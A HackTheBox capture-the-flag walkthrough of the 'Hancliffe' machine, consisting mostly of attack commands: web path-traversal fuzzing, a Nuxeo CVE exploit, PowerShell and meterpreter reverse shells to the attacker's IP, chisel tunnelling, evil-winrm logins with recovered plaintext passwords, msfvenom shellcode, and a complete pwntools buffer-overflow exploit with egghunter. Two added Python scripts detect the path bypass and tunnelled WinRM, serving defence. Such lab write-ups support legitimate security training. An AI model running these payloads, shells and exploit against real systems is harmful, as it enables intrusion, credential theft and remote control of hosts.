HackTheBox – Hancliffe Walkthrough – In English
┌──(root💀kali)-[/home/kali/Downloads]
└─# nmap -A 10.10.11.115
┌──(root💀kali)-[/home/kali/Downloads]
└─# cat /etc/hosts | grep 10.10.11.115
┌──(root💀kali)-[/home/kali/Downloads]
└─# gobuster dir -u hancliffe.htb -w /usr/share/wordlists/dirb/common.txt -b 404
http://hancliffe.htb/maintenance
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/raft-small-files.txt
┌──(root💀kali)-[/home/kali/Downloads]
└─# gobuster dir -u hancliffe.htb/maintenance -w /opt/SecLists/Discovery/Web-Content/raft-small-files.txt -b 404,502
┌──(root💀kali)-[/home/kali/Downloads]
└─# ffuf -u "http://10.10.11.115/maintenance/..;/FUZZ" -mc 200 -w /home/kali/Downloads/SecLists/Discovery/Web-Content/raft-small-files.txt
http://hancliffe.htb/maintenance/..;/home.html
http://hancliffe.htb/maintenance/..;/login.jsp
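Why `..;/` gets past the front proxy, and how to spot it afterwards, as an added example that is not part of the original walkthrough: Tomcat treats `;...` inside a path segment as a path parameter and strips it before it normalises `..`, so a front-end rule that only matches the literal `/maintenance` prefix forwards `/maintenance/..;/login.jsp` and the backend serves `/login.jsp`. The script below replays that normalisation over constructed nginx-style access-log lines and reports requests whose raw path passed the prefix check but resolve outside it. The log lines, the client IP and the `tomcat_view` approximation of Tomcat's URI handling are assumptions, not data from the page.

```python
import re
from urllib.parse import unquote

# Constructed combined-format access-log lines (not from the page's target).
SAMPLE_LOG = """\
192.0.2.10 - - [13/Oct/2021:10:01:02 +0000] "GET /maintenance HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.10 - - [13/Oct/2021:10:01:05 +0000] "GET /maintenance/..;/login.jsp HTTP/1.1" 200 2048 "-" "ffuf"
192.0.2.10 - - [13/Oct/2021:10:01:06 +0000] "GET /maintenance/%2e%2e;/home.html HTTP/1.1" 200 1024 "-" "ffuf"
192.0.2.10 - - [13/Oct/2021:10:01:07 +0000] "GET /maintenance/static/app.css HTTP/1.1" 200 300 "-" "Mozilla/5.0"
192.0.2.10 - - [13/Oct/2021:10:01:08 +0000] "GET /maintenance/foo;jsessionid=abc/bar HTTP/1.1" 404 0 "-" "curl"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)


def under(path, prefix):
    """Literal prefix match, the way a simple 'location /maintenance' proxy rule sees the path."""
    prefix = prefix.rstrip('/')
    return path == prefix or path.startswith(prefix + '/')


def tomcat_view(raw_path):
    """Approximate how Tomcat resolves a raw request path (assumption, simplified):
    per segment, drop the ';param' suffix first (Tomcat parses path parameters on the
    undecoded URI), then percent-decode, then resolve '.' and '..'."""
    raw_path = raw_path.split('?', 1)[0]
    out = []
    for seg in raw_path.split('/'):
        seg = unquote(seg.split(';', 1)[0])
        if seg in ('', '.'):
            continue
        if seg == '..':
            if out:
                out.pop()
            continue
        out.append(seg)
    return '/' + '/'.join(out)


def find_prefix_escapes(log_text, allowed_prefix):
    """Return (ip, raw_path, resolved_path) for requests that passed the proxy's literal
    prefix check but resolve, after Tomcat-style normalisation, outside that prefix."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not under(m['path'], allowed_prefix):
            continue
        resolved = tomcat_view(m['path'])
        if not under(resolved, allowed_prefix):
            hits.append((m['ip'], m['path'], resolved))
    return hits


if __name__ == '__main__':
    for ip, raw, resolved in find_prefix_escapes(SAMPLE_LOG, '/maintenance'):
        print(f'{ip} requested {raw} -> backend served {resolved}')
```

The fix on the proxy side is to normalise the path before matching, or to reject any segment containing `;` or `..` before forwarding; the check above is for finding out whether that already happened.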
┌──(root💀kali)-[/home/kali/Downloads]
└─# searchsploit Nuxeo
https://github.com/mpgn/CVE-2018-16341
┌──(root💀kali)-[/home/kali/Downloads]
└─# git clone https://github.com/mpgn/CVE-2018-16341.git
┌──(root💀kali)-[/home/kali/Downloads/CVE-2018-16341]
└─# python3 ./CVE-2018-16341.py
command (WIN)> whoami
┌──(root💀kali)-[/home/kali/Downloads]
└─# nc -lvnp 1234
As you can see, we now have a shell as 'svc_account'. As noted, this is not an interactive shell, just a proof of concept; however, we can use it to launch a PowerShell reverse shell. For that we need a base64-encoded PowerShell payload, which you can generate on the RevShells website by choosing PowerShell #3 (base64).
PS C:\Nuxeo> whoami
https://github.com/carlospolop/PEASS-ng/releases/tag/refs/pull/253/merge
┌──(root💀kali)-[/home/kali/Downloads]
└─# python3 -m http.server 8000
PS C:\Nuxeo> curl 10.10.14.4:8000/winPEASx64.exe -o winPEASx641.exe
PS C:\Nuxeo> .\winPEASx641.exe
When we run winPEAS, we get a lot of information. One of the services it lists, Unified Remote, listens on port 9512 and is vulnerable.
┌──(root💀kali)-[/home/kali/Downloads]
└─# searchsploit 'unified remote 3'
msf6 > use /exploit/multi/handler
msf6 exploit(multi/handler) > use payload/windows/x64/meterpreter/reverse_tcp
msf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost 10.10.14.4
msf6 payload(windows/x64/meterpreter/reverse_tcp) > show options
msf6 payload(windows/x64/meterpreter/reverse_tcp) > generate -f exe -o reverse.exe
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.14.4
msf6 exploit(multi/handler) > exploit
PS C:\Nuxeo> curl 10.10.14.4:8000/reverse.exe -o rev.exe
PS C:\Nuxeo> .\rev.exe
meterpreter > getuid
meterpreter > portfwd add -l 9512 -p 9512 -r 10.10.11.115
┌──(root💀kali)-[/home/kali/Downloads]
└─# netstat -nlpt
meterpreter > background
msf6 exploit(multi/handler) > exploit
┌──(root💀kali)-[/home/kali/Downloads]
└─# locate 49587.py
┌──(root💀kali)-[/home/kali/Downloads]
└─# python3 -m http.server 80
┌──(root💀kali)-[/home/kali/Downloads]
└─# python2 49587.py 127.0.0.1 10.10.14.4 reverse.exe
meterpreter > getuid
meterpreter > pwd
meterpreter > cd Desktop
meterpreter > dir
meterpreter > cat user.txt
PS C:\Users\clara> curl 10.10.14.102:80/winPEASx64.exe -o win64.exe
PS C:\Users\clara> .\win64.exe
Url: http://localhost:8000
Username: hancliffe.htb
Password: #@H@ncLiff3D3velopm3ntM@st3rK3y*!
We get the generated password: AMl.q2DHp?2.C/V0kNFU
PS C:\Users\clara> curl 10.10.14.102:80/chisel.exe -o chisel.exe
┌──(root💀kali)-[/home/kali/Downloads]
└─# ./chisel server -p 8000 --reverse
PS C:\Users\clara> .\chisel.exe client 10.10.14.102:8000 R:5985:127.0.0.1:5985
┌──(root💀kali)-[/home/kali/Downloads]
└─# evil-winrm -i 127.0.0.1 -u development -p 'AMl.q2DHp?2.C/V0kNFU'
*Evil-WinRM* PS C:\Users\development\Documents> whoami
*Evil-WinRM* PS C:\Users\development\Documents> cd ..
*Evil-WinRM* PS C:\Users\development> cd ..
*Evil-WinRM* PS C:\Users> cd ..
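The chisel reverse forward (`R:5985:127.0.0.1:5985`) means the WinRM logon above reaches the host over loopback, from chisel.exe, rather than from a management workstation. As an added detection example that is not part of the walkthrough, the script below scans constructed Sysmon Event ID 3 (NetworkConnect) records for processes that connect to the local WinRM listener over loopback and are not on an allowlist, and lists the remote peers those same processes talked to, which is where a tunnel's control channel shows up. The records, file paths, addresses and allowlist are assumptions; loopback WinRM use does occur legitimately, so the allowlist should be baselined per host.

```python
import ipaddress
from collections import defaultdict

WINRM_PORTS = {5985, 5986}
# Processes allowed to talk to the local WinRM listener (assumption; baseline this per host).
LOOPBACK_WINRM_ALLOWLIST = {r"c:\windows\system32\windowspowershell\v1.0\powershell.exe"}

# Constructed Sysmon Event ID 3 records flattened to dicts; not from the page's target.
SAMPLE_EID3 = [
    {"UtcTime": "2021-10-13 10:20:01", "Image": r"C:\Users\clara\chisel.exe", "Initiated": "true",
     "SourceIp": "10.0.0.50", "SourcePort": 49811, "DestinationIp": "203.0.113.5", "DestinationPort": 8000},
    {"UtcTime": "2021-10-13 10:20:09", "Image": r"C:\Users\clara\chisel.exe", "Initiated": "true",
     "SourceIp": "127.0.0.1", "SourcePort": 49820, "DestinationIp": "127.0.0.1", "DestinationPort": 5985},
    {"UtcTime": "2021-10-13 10:21:00", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Initiated": "true", "SourceIp": "127.0.0.1", "SourcePort": 49830,
     "DestinationIp": "127.0.0.1", "DestinationPort": 5985},
    {"UtcTime": "2021-10-13 10:22:00", "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "Initiated": "true", "SourceIp": "10.0.0.50", "SourcePort": 49840,
     "DestinationIp": "203.0.113.9", "DestinationPort": 443},
]


def is_loopback(ip):
    """True for 127.0.0.0/8 and ::1; malformed values are treated as not loopback."""
    try:
        return ipaddress.ip_address(ip).is_loopback
    except ValueError:
        return False


def find_tunnelled_winrm(events):
    """Flag non-allowlisted processes that initiated a connection to WinRM over loopback.
    Each finding carries the count of such connections and the process's non-loopback
    destination peers, which for a reverse tunnel include the tunnel server."""
    by_image = defaultdict(list)
    for ev in events:
        if str(ev.get("Initiated", "")).lower() == "true":
            by_image[ev["Image"].lower()].append(ev)

    findings = []
    for image, evs in by_image.items():
        if image in LOOPBACK_WINRM_ALLOWLIST:
            continue
        loop_winrm = [e for e in evs
                      if is_loopback(e["DestinationIp"]) and int(e["DestinationPort"]) in WINRM_PORTS]
        if not loop_winrm:
            continue
        peers = {f'{e["DestinationIp"]}:{e["DestinationPort"]}'
                 for e in evs if not is_loopback(e["DestinationIp"])}
        findings.append({"image": image,
                         "loopback_winrm": len(loop_winrm),
                         "remote_peers": sorted(peers)})
    return findings


if __name__ == "__main__":
    for f in find_tunnelled_winrm(SAMPLE_EID3):
        print(f'{f["image"]}: {f["loopback_winrm"]} loopback WinRM connect(s); peers {f["remote_peers"]}')
```

The same pattern covers the meterpreter `portfwd` used earlier on this box: the forwarding process is the one with both the outbound control connection and the loopback connection to the forwarded service. A Security 4624 event with LogonType 3 and IpAddress 127.0.0.1 for the `development` account is the matching corroboration on the authentication side.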
┌──(root💀kali)-[/home/kali/Downloads]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.102 LPORT=7575 -b "\x00" EXITFUNC=thread -f python
Output:
buf = b""
buf += b"\xd9\xcb\xd9\x74\x24\xf4\xbb\xd3\x47\x73\xbc\x5d\x31"
buf += b"\xc9\xb1\x52\x31\x5d\x17\x83\xed\xfc\x03\x8e\x54\x91"
buf += b"\x49\xcc\xb3\xd7\xb2\x2c\x44\xb8\x3b\xc9\x75\xf8\x58"
buf += b"\x9a\x26\xc8\x2b\xce\xca\xa3\x7e\xfa\x59\xc1\x56\x0d"
buf += b"\xe9\x6c\x81\x20\xea\xdd\xf1\x23\x68\x1c\x26\x83\x51"
buf += b"\xef\x3b\xc2\x96\x12\xb1\x96\x4f\x58\x64\x06\xfb\x14"
buf += b"\xb5\xad\xb7\xb9\xbd\x52\x0f\xbb\xec\xc5\x1b\xe2\x2e"
buf += b"\xe4\xc8\x9e\x66\xfe\x0d\x9a\x31\x75\xe5\x50\xc0\x5f"
buf += b"\x37\x98\x6f\x9e\xf7\x6b\x71\xe7\x30\x94\x04\x11\x43"
buf += b"\x29\x1f\xe6\x39\xf5\xaa\xfc\x9a\x7e\x0c\xd8\x1b\x52"
buf += b"\xcb\xab\x10\x1f\x9f\xf3\x34\x9e\x4c\x88\x41\x2b\x73"
buf += b"\x5e\xc0\x6f\x50\x7a\x88\x34\xf9\xdb\x74\x9a\x06\x3b"
buf += b"\xd7\x43\xa3\x30\xfa\x90\xde\x1b\x93\x55\xd3\xa3\x63"
buf += b"\xf2\x64\xd0\x51\x5d\xdf\x7e\xda\x16\xf9\x79\x1d\x0d"
buf += b"\xbd\x15\xe0\xae\xbe\x3c\x27\xfa\xee\x56\x8e\x83\x64"
buf += b"\xa6\x2f\x56\x2a\xf6\x9f\x09\x8b\xa6\x5f\xfa\x63\xac"
buf += b"\x6f\x25\x93\xcf\xa5\x4e\x3e\x2a\x2e\x7b\xb5\x3a\xc8"
buf += b"\x13\xcb\x42\x09\x73\x42\xa4\x5b\x6b\x03\x7f\xf4\x12"
buf += b"\x0e\x0b\x65\xda\x84\x76\xa5\x50\x2b\x87\x68\x91\x46"
buf += b"\x9b\x1d\x51\x1d\xc1\x88\x6e\x8b\x6d\x56\xfc\x50\x6d"
buf += b"\x11\x1d\xcf\x3a\x76\xd3\x06\xae\x6a\x4a\xb1\xcc\x76"
buf += b"\x0a\xfa\x54\xad\xef\x05\x55\x20\x4b\x22\x45\xfc\x54"
buf += b"\x6e\x31\x50\x03\x38\xef\x16\xfd\x8a\x59\xc1\x52\x45"
buf += b"\x0d\x94\x98\x56\x4b\x99\xf4\x20\xb3\x28\xa1\x74\xcc"
buf += b"\x85\x25\x71\xb5\xfb\xd5\x7e\x6c\xb8\xf6\x9c\xa4\xb5"
buf += b"\x9e\x38\x2d\x74\xc3\xba\x98\xbb\xfa\x38\x28\x44\xf9"
buf += b"\x21\x59\x41\x45\xe6\xb2\x3b\xd6\x83\xb4\xe8\xd7\x81"
Reference Link: https://7rocky.github.io/en/htb/hancliffe/
Exploit.py
from pwn import *

io = remote('hancliffe.htb', 9999)

offset = 66                    # bytes of "Input Your Code" before the saved return address is overwritten
jmp_eax = p32(0x719023b3)      # address of a 'jmp eax' gadget; eax points back into our input, where the egghunter sits

# Egghunter. Starts with 'sub sp, 0x150' to move the stack pointer away from the hunter's own
# bytes, then walks memory page by page, probing each page with a system call so that
# unmapped pages do not crash the process, looking for the 'w00tw00t' egg; when found it
# jumps to the shellcode that follows the egg.
egghunter = (b"\x66\x81\xEC\x50\x01\x33\xd2\x66\x81\xca\xff\x0f\x33\xdb\x42\x53\x53\x52\x53\x53"
             b"\x53\x6a\x29\x58\xb3\xc0\x64\xff\x13\x83\xc4\x0c\x5a\x83\xc4\x08"
             b"\x3c\x05\x74\xdf\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xda\xaf\x75"
             b"\xd7\xff\xe7")

# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.74 LPORT=7575 -b "\x00" EXITFUNC=thread -f python
buf = b""
buf += b"\xd9\xcb\xd9\x74\x24\xf4\xbb\xd3\x47\x73\xbc\x5d\x31"
buf += b"\xc9\xb1\x52\x31\x5d\x17\x83\xed\xfc\x03\x8e\x54\x91"
buf += b"\x49\xcc\xb3\xd7\xb2\x2c\x44\xb8\x3b\xc9\x75\xf8\x58"
buf += b"\x9a\x26\xc8\x2b\xce\xca\xa3\x7e\xfa\x59\xc1\x56\x0d"
buf += b"\xe9\x6c\x81\x20\xea\xdd\xf1\x23\x68\x1c\x26\x83\x51"
buf += b"\xef\x3b\xc2\x96\x12\xb1\x96\x4f\x58\x64\x06\xfb\x14"
buf += b"\xb5\xad\xb7\xb9\xbd\x52\x0f\xbb\xec\xc5\x1b\xe2\x2e"
buf += b"\xe4\xc8\x9e\x66\xfe\x0d\x9a\x31\x75\xe5\x50\xc0\x5f"
buf += b"\x37\x98\x6f\x9e\xf7\x6b\x71\xe7\x30\x94\x04\x11\x43"
buf += b"\x29\x1f\xe6\x39\xf5\xaa\xfc\x9a\x7e\x0c\xd8\x1b\x52"
buf += b"\xcb\xab\x10\x1f\x9f\xf3\x34\x9e\x4c\x88\x41\x2b\x73"
buf += b"\x5e\xc0\x6f\x50\x7a\x88\x34\xf9\xdb\x74\x9a\x06\x3b"
buf += b"\xd7\x43\xa3\x30\xfa\x90\xde\x1b\x93\x55\xd3\xa3\x63"
buf += b"\xf2\x64\xd0\x51\x5d\xdf\x7e\xda\x16\xf9\x79\x1d\x0d"
buf += b"\xbd\x15\xe0\xae\xbe\x3c\x27\xfa\xee\x56\x8e\x83\x64"
buf += b"\xa6\x2f\x56\x2a\xf6\x9f\x09\x8b\xa6\x5f\xfa\x63\xac"
buf += b"\x6f\x25\x93\xcf\xa5\x4e\x3e\x2a\x2e\x7b\xb5\x3a\xc8"
buf += b"\x13\xcb\x42\x09\x73\x42\xa4\x5b\x6b\x03\x7f\xf4\x12"
buf += b"\x0e\x0b\x65\xda\x84\x76\xa5\x50\x2b\x87\x68\x91\x46"
buf += b"\x9b\x1d\x51\x1d\xc1\x88\x6e\x8b\x6d\x56\xfc\x50\x6d"
buf += b"\x11\x1d\xcf\x3a\x76\xd3\x06\xae\x6a\x4a\xb1\xcc\x76"
buf += b"\x0a\xfa\x54\xad\xef\x05\x55\x20\x4b\x22\x45\xfc\x54"
buf += b"\x6e\x31\x50\x03\x38\xef\x16\xfd\x8a\x59\xc1\x52\x45"
buf += b"\x0d\x94\x98\x56\x4b\x99\xf4\x20\xb3\x28\xa1\x74\xcc"
buf += b"\x85\x25\x71\xb5\xfb\xd5\x7e\x6c\xb8\xf6\x9c\xa4\xb5"
buf += b"\x9e\x38\x2d\x74\xc3\xba\x98\xbb\xfa\x38\x28\x44\xf9"
buf += b"\x21\x59\x41\x45\xe6\xb2\x3b\xd6\x83\xb4\xe8\xd7\x81"

# Layout: egghunter, NOP padding up to the return address, 'jmp eax', a NOP sled,
# the egg, then the msfvenom shellcode that the egghunter locates.
payload = b""
payload += egghunter
payload += b"\x90" * (offset - len(egghunter))
payload += jmp_eax
payload += b"\x90" * 50
payload += b"w00tw00t"
payload += buf

# pwntools expects bytes here; the reverse shell lands on the nc listener, not on this socket.
io.sendlineafter(b"Username: ", b"alfiansyah")
io.sendlineafter(b"Password: ", b"K3r4j@@nM4j@pAh!T")
io.sendlineafter(b"FullName: ", b"what ever")
io.sendlineafter(b"Input Your Code: ", payload)
┌──(root💀kali)-[/home/kali/Downloads]
└─# nc -lvnp 7575
┌──(root💀kali)-[/home/kali/Downloads]
└─# python3 exploit.py
C:\Windows\system32>cd ..
C:\Windows>cd ..
C:\>cd Users
C:\Users>cd Administrator
C:\Users\Administrator>cd Desktop
C:\Users\Administrator\Desktop>type root.txt